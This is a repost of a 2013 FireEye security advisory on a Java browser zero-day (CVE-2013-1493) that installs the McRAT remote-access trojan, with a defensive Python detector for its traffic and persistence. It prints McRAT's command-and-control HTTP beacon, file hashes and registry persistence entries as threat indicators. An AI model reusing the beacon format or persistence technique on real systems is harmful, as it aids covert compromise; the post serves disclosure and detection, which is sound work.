YAJ0: Yet Another Java Zero-Day

Posted by admin, 3 April 2021 19:22:54

Author: Darien Kindlund & Yichong Lin, February 28, 2013

Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.

Unlike other popular Java vulnerabilities, in which the security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in the JVM process. After triggering the vulnerability, the exploit searches memory for the JVM internal data structure that records, among other things, whether the security manager is enabled, and then overwrites that chunk of memory with zeros. Upon successful exploitation, it downloads a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99, served as svchost.jpg) from the same server hosting the JAR file and then executes it.

Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised.

The exploit is not very reliable, as it tries to overwrite a large chunk of memory. As a result, in most cases we still see the payload being downloaded after exploitation, but it fails to execute and the JVM crashes. When McRAT does install successfully on the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:

POST /59788582 HTTP/1.0
Content-Length: 44
Accept: text/html,application/xhtml+xml,application/xml,*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 110.XXX.55.187
Pragma: no-cache

4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.

McRAT persists by writing a copy of itself as a DLL to C:\Documents and Settings\admin\AppMgmt.dll and performing the following registry modifications:

\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll
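The C2 beacon and the ServiceDll persistence above give a defender two concrete things to check. The following Python is an added example (not FireEye's code): it parses raw HTTP requests and reports which traits of the McRAT beacon are present, and it flags an AppMgmt ServiceDll value that does not point at appmgmts.dll under System32. The sample requests are constructed; the Host address is a documentation IP standing in for the redacted one in the post.

```python
import re

# Constructed sample traffic: a McRAT-style beacon modelled on the request in
# the post, and an ordinary browser request that shares the same User-Agent.
MCRAT_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
SAMPLE_REQUESTS = [
    "POST /59788582 HTTP/1.0\r\nContent-Length: 44\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml,*/*\r\n"
    f"User-Agent: {MCRAT_UA}\r\nHost: 203.0.113.5\r\nPragma: no-cache\r\n\r\n"
    "4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    f"User-Agent: {MCRAT_UA}\r\n\r\n",
]

def parse_request(raw):
    """Split a raw HTTP request into (method, path, version, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers, body

def mcrat_indicators(raw):
    """Return the list of McRAT beacon traits present in one request."""
    method, path, version, headers, body = parse_request(raw)
    hits = []
    if method == "POST" and version == "HTTP/1.0":
        hits.append("post_http10")
    if re.fullmatch(r"/\d{6,}", path):          # all-digit resource name
        hits.append("numeric_path")
    if headers.get("content-length") == "44" and len(body) == 44:
        hits.append("length_44")
    if re.fullmatch(r"[A-Za-z0-9+/]{43}\.", body):  # base64-like, dot-terminated
        hits.append("base64_body_dot")
    if headers.get("pragma") == "no-cache" and headers.get("user-agent") == MCRAT_UA:
        hits.append("ua_pragma")
    return hits

def is_mcrat_beacon(raw):
    # Alert on the structural traits; the User-Agent alone is far too common.
    return {"post_http10", "numeric_path", "base64_body_dot"} <= set(mcrat_indicators(raw))

def appmgmt_servicedll_suspicious(value):
    """True when the AppMgmt ServiceDll is not appmgmts.dll under System32,
    e.g. the AppMgmt.dll that McRAT drops into the user's profile."""
    norm = value.strip().strip('"').lower().replace("/", "\\")
    directory, _, name = norm.rpartition("\\")
    return not (name == "appmgmts.dll" and directory.endswith("\\system32"))
```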

This post is intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in their browser until a patch has been released; alternatively, set your Java security settings to "High" and do not execute any unknown Java applets from outside your organization.

We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability.


This blog was written by FireEye researchers Darien Kindlund and Yichong Lin.

Update: Oracle assigned CVE-2013-1493 on this vulnerability.

from: http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/yaj0-yet-another-java-zero-day-2.html

Article source: lcx.cc, "YAJ0: Yet Another Java Zero-Day"

Reposted on CN-SEC 中文网 (keep this link when reposting; thanks to the original authors): https://cn-sec.com/archives/322034.html